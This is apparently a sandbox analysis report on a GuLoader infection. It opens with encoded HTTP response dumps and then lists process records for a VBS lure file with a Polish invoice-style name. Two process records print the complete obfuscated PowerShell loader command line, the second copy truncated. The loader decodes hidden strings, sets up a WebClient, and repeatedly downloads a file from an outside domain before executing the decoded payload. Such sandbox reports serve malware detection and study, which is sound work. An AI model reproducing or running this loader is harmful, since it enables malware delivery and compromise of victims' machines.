                                    Data Ascii: Im828HM8vWUsKdrenhFQESLkeZ+20vWeRRwowpfaot9xEIi2ptUsfOQ97d122Tpp5STx7hYQXPvyPjRdLePZdIJZUGHOi6pX3tN66vKu7M9CTdSOQ73m2BeV5TZbhjHJhLxOE+3AVuQTIBKp37x+HMP4pOQj2Uz41bS2UBKTpTfvF+PM2/OqISprouUqnLDxfE95lzatrjHxvvM9u/SsMvfw5uxd0Lxl4IKVim6ucb0JE/l41vA0pD8EvCPKW3M
                                    2024-10-24 13:07:12 UTC16384INData Raw: 44 4e 74 52 35 42 4d 6c 69 55 63 64 62 79 48 73 41 6a 79 6e 2b 49 61 34 64 42 7a 72 4b 33 37 6d 7a 70 35 36 46 54 63 66 6a 30 61 4b 50 71 6b 72 67 43 58 6c 2f 42 74 65 66 45 62 50 6a 4c 56 6f 61 33 59 34 76 4c 6f 45 66 7a 35 68 79 33 7a 71 34 42 54 71 32 72 4a 36 4e 6c 78 68 30 76 7a 6e 4e 43 34 38 69 76 48 35 43 30 43 77 6f 54 53 46 34 51 55 67 58 53 46 4c 6f 4f 6d 42 67 4c 6d 41 37 33 38 6d 37 4d 54 50 75 68 4a 41 44 58 47 34 73 72 43 30 6c 43 59 6a 7a 66 61 4a 5a 66 72 67 57 75 37 6e 2b 46 6d 78 48 73 4a 6f 76 71 39 39 61 75 71 37 36 32 72 6f 74 44 48 33 61 4e 76 67 4f 57 55 35 74 37 2b 38 53 2b 38 31 30 34 76 6b 4a 71 4b 55 6c 63 64 76 42 31 58 35 41 5a 44 6b 43 71 69 54 31 66 79 38 56 77 4d 73 6c 5a 2f 6b 45 6f 43 6d 68 67 32 30 72 33 46 73 39 71 41
                                    Data Ascii: DNtR5BMliUcdbyHsAjyn+Ia4dBzrK37mzp56FTcfj0aKPqkrgCXl/BtefEbPjLVoa3Y4vLoEfz5hy3zq4BTq2rJ6Nlxh0vznNC48ivH5C0CwoTSF4QUgXSFLoOmBgLmA738m7MTPuhJADXG4srC0lCYjzfaJZfrgWu7n+FmxHsJovq99auq762rotDH3aNvgOWU5t7+8S+8104vkJqKUlcdvB1X5AZDkCqiT1fy8VwMslZ/kEoCmhg20r3Fs9qA
                                    2024-10-24 13:07:12 UTC16384INData Raw: 76 33 39 79 46 47 48 2b 32 64 69 70 39 6a 79 57 64 6a 43 6b 64 53 7a 5a 4e 51 53 52 4a 4a 6b 6e 57 33 42 70 50 2b 6e 56 4f 34 56 2f 77 36 50 33 65 4a 32 79 4f 64 4f 35 52 62 73 69 67 2f 4d 42 61 6e 48 6f 57 2b 5a 63 6c 2f 71 79 68 2f 6e 75 6f 2b 4d 38 6c 32 56 39 33 39 46 68 31 31 68 6c 77 56 63 30 62 32 38 6c 32 6e 41 59 34 46 47 34 43 47 68 33 4a 32 48 67 36 78 61 30 77 54 61 39 59 72 6f 4e 44 37 42 43 4b 6d 70 71 51 76 31 2f 55 4c 4c 6e 4d 6c 39 79 54 48 35 48 76 45 72 6f 4b 77 5a 38 35 42 65 6e 6c 58 37 38 76 48 72 4e 44 76 6b 34 4e 33 79 30 58 32 54 61 6f 4e 76 67 47 45 47 76 52 73 39 72 76 47 4d 4b 65 76 69 59 2f 30 6d 6b 5a 37 54 53 7a 4d 64 49 33 38 73 7a 38 6c 62 45 65 4e 2b 48 35 77 58 41 51 38 4a 75 4e 44 70 63 30 55 56 6f 4e 75 75 57 37 70 4a
                                    Data Ascii: v39yFGH+2dip9jyWdjCkdSzZNQSRJJknW3BpP+nVO4V/w6P3eJ2yOdO5Rbsig/MBanHoW+Zcl/qyh/nuo+M8l2V939Fh11hlwVc0b28l2nAY4FG4CGh3J2Hg6xa0wTa9YroND7BCKmpqQv1/ULLnMl9yTH5HvEroKwZ85BenlX78vHrNDvk4N3y0X2TaoNvgGEGvRs9rvGMKeviY/0mkZ7TSzMdI38sz8lbEeN+H5wXAQ8JuNDpc0UVoNuuW7pJ
                                    2024-10-24 13:07:12 UTC16384INData Raw: 69 54 6e 71 50 78 62 2b 30 35 49 68 46 76 69 4a 79 31 73 34 72 4b 50 43 4d 50 58 68 50 62 30 51 46 37 31 44 56 61 50 4b 66 74 4a 4c 49 6f 47 69 34 37 5a 30 79 59 75 38 6a 6e 39 48 45 44 76 6b 30 39 6d 75 42 68 4c 55 63 57 58 67 50 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                    Data Ascii: iTnqPxb+05IhFviJy1s4rKPCMPXhPb0QF71DVaPKftJLIoGi47Z0yYu8jn9HEDvk09muBhLUcWXgPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                    2024-10-24 13:07:12 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4d 74 34 64 69 63 2b 42 62 52 50 77 44 77 59 6e 41 38 53 5a 65 41 79 4f 52 64 73 77 6b 4c 6b 30 33 58 4c 78 76 71 38 6c 6d 48 48 33 71 32 54 4a 7a 45 38 54 6f 79 43 61 6e 42 70 73 4d 42 6e 34 44 30 35 69 56 6b 39 46 71 36 74 76 48 79
                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMt4dic+BbRPwDwYnA8SZeAyORdswkLk03XLxvq8lmHH3q2TJzE8ToyCanBpsMBn4D05iVk9Fq6tvHy
                                    2024-10-24 13:07:12 UTC16384INData Raw: 64 69 59 4b 51 6a 31 77 67 44 66 73 4b 30 49 2f 34 54 37 4f 38 4c 30 4a 74 76 64 6b 35 4f 4a 64 42 32 4e 78 74 62 79 4a 4d 30 6b 37 36 4d 42 4b 2f 4a 33 46 43 66 78 41 45 7a 41 75 41 6f 49 5a 2f 6f 54 55 43 55 71 5a 30 44 4a 66 55 43 2b 64 59 72 78 36 4a 48 46 2b 72 2b 51 58 70 6a 52 4d 76 37 78 53 73 33 73 6f 64 2b 7a 2f 2b 5a 6a 51 2b 61 56 6e 74 52 49 61 49 43 67 45 4d 64 72 63 43 4d 53 6d 42 43 7a 36 46 4c 70 44 52 62 4e 52 56 55 49 6f 62 51 6d 36 6d 59 67 74 35 2f 73 36 61 63 4d 38 6f 2b 41 74 76 57 58 52 39 44 54 59 76 7a 2b 39 5a 57 6e 79 36 71 6b 71 63 4a 6c 58 7a 4f 67 58 68 68 4b 30 31 50 2b 34 44 36 71 4c 58 30 50 57 4c 68 30 6a 65 38 77 59 39 4a 59 68 61 34 44 69 5a 2b 41 39 51 68 50 77 57 37 4b 69 30 6a 32 71 32 51 76 72 4e 6b 41 42 43 78 63
                                    Data Ascii: diYKQj1wgDfsK0I/4T7O8L0Jtvdk5OJdB2NxtbyJM0k76MBK/J3FCfxAEzAuAoIZ/oTUCUqZ0DJfUC+dYrx6JHF+r+QXpjRMv7xSs3sod+z/+ZjQ+aVntRIaICgEMdrcCMSmBCz6FLpDRbNRVUIobQm6mYgt5/s6acM8o+AtvWXR9DTYvz+9ZWny6qkqcJlXzOgXhhK01P+4D6qLX0PWLh0je8wY9JYha4DiZ+A9QhPwW7Ki0j2q2QvrNkABCxc
                                    2024-10-24 13:07:12 UTC16384INData Raw: 35 73 4e 74 35 47 58 52 76 47 58 67 49 66 54 77 73 57 34 47 56 77 36 47 36 4f 59 62 50 37 4c 68 66 38 53 2f 5a 62 75 35 62 79 59 66 73 46 46 6b 34 44 33 49 6b 74 6a 74 2f 71 4c 6a 35 6a 68 78 63 72 79 4f 61 45 38 59 72 4f 45 7a 76 49 34 2b 37 48 50 69 35 4e 4e 51 73 51 35 46 75 48 62 73 58 54 4b 2f 5a 65 42 62 4f 4b 35 66 59 5a 67 56 2b 51 56 49 35 42 65 33 4b 2b 68 30 6c 45 75 50 6b 48 33 62 58 43 4b 38 55 6e 35 47 37 43 66 67 49 72 78 36 4c 42 4c 75 73 56 77 68 50 45 62 75 58 54 4b 2f 5a 65 43 39 51 6f 6f 6e 50 67 79 38 38 61 6c 42 35 4f 50 72 4d 38 65 56 76 49 37 31 66 51 45 6b 35 52 72 47 50 47 61 64 38 54 46 4b 68 67 52 32 6f 6d 58 6d 76 47 58 67 67 6e 44 62 46 4c 7a 41 46 63 73 45 76 57 58 76 73 4f 61 65 34 6a 30 38 30 44 73 38 76 57 55 2b 48 67 6b
                                    Data Ascii: 5sNt5GXRvGXgIfTwsW4GVw6G6OYbP7Lhf8S/Zbu5byYfsFFk4D3Iktjt/qLj5jhxcryOaE8YrOEzvI4+7HPi5NNQsQ5FuHbsXTK/ZeBbOK5fYZgV+QVI5Be3K+h0lEuPkH3bXCK8Un5G7CfgIrx6LBLusVwhPEbuXTK/ZeC9QoonPgy88alB5OPrM8eVvI71fQEk5RrGPGad8TFKhgR2omXmvGXggnDbFLzAFcsEvWXvsOae4j080Ds8vWU+Hgk
                                    2024-10-24 13:07:12 UTC16384INData Raw: 77 2b 67 4a 78 6c 72 33 6a 6c 6f 67 4d 49 45 34 6a 35 58 45 46 6c 33 78 30 4f 51 76 43 59 2b 71 36 37 33 58 64 32 48 4b 65 34 32 59 70 6a 79 4b 34 50 6f 51 6f 37 47 45 45 46 64 47 44 54 79 55 2b 2b 55 59 43 57 48 4d 2f 6a 33 6a 59 54 52 73 73 31 6e 39 63 71 2b 43 39 50 37 48 50 35 38 73 30 4f 74 51 4a 44 65 4e 74 67 75 51 6a 42 66 41 6e 72 46 34 37 54 41 4f 4b 4b 71 6b 4a 63 68 6b 75 57 6f 32 32 42 63 38 76 57 58 76 50 57 4a 56 34 43 6f 2b 39 31 51 44 30 4d 49 39 31 4e 4e 6a 38 4f 73 73 46 41 68 4b 36 35 77 75 36 67 6f 39 4b 77 68 4d 35 79 5a 48 6a 32 63 77 6d 6a 54 77 43 7a 79 39 5a 56 70 66 58 52 6a 62 4d 72 32 38 52 7a 32 63 70 2b 33 33 58 59 36 61 7a 44 47 79 43 4c 78 50 30 44 43 78 7a 4f 51 53 35 36 6a 46 59 4c 78 50 61 63 56 73 64 7a 64 61 68 37 39
                                    Data Ascii: w+gJxlr3jlogMIE4j5XEFl3x0OQvCY+q673Xd2HKe42YpjyK4PoQo7GEEFdGDTyU++UYCWHM/j3jYTRss1n9cq+C9P7HP58s0OtQJDeNtguQjBfAnrF47TAOKKqkJchkuWo22Bc8vWXvPWJV4Co+91QD0MI91NNj8OssFAhK65wu6go9KwhM5yZHj2cwmjTwCzy9ZVpfXRjbMr28Rz2cp+33XY6azDGyCLxP0DCxzOQS56jFYLxPacVsdzdah79


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:07:06
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
                                    Imagebase:0x7ff720ae0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:07:06
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping Horm5zl_6637.6637.6637.657e
                                    Imagebase:0x7ff7ba6e0000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:09:07:06
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:09:07:07
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
                                    Imagebase:0x7ff6eb350000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:09:07:07
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:09:07:16
                                    Start date:24/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 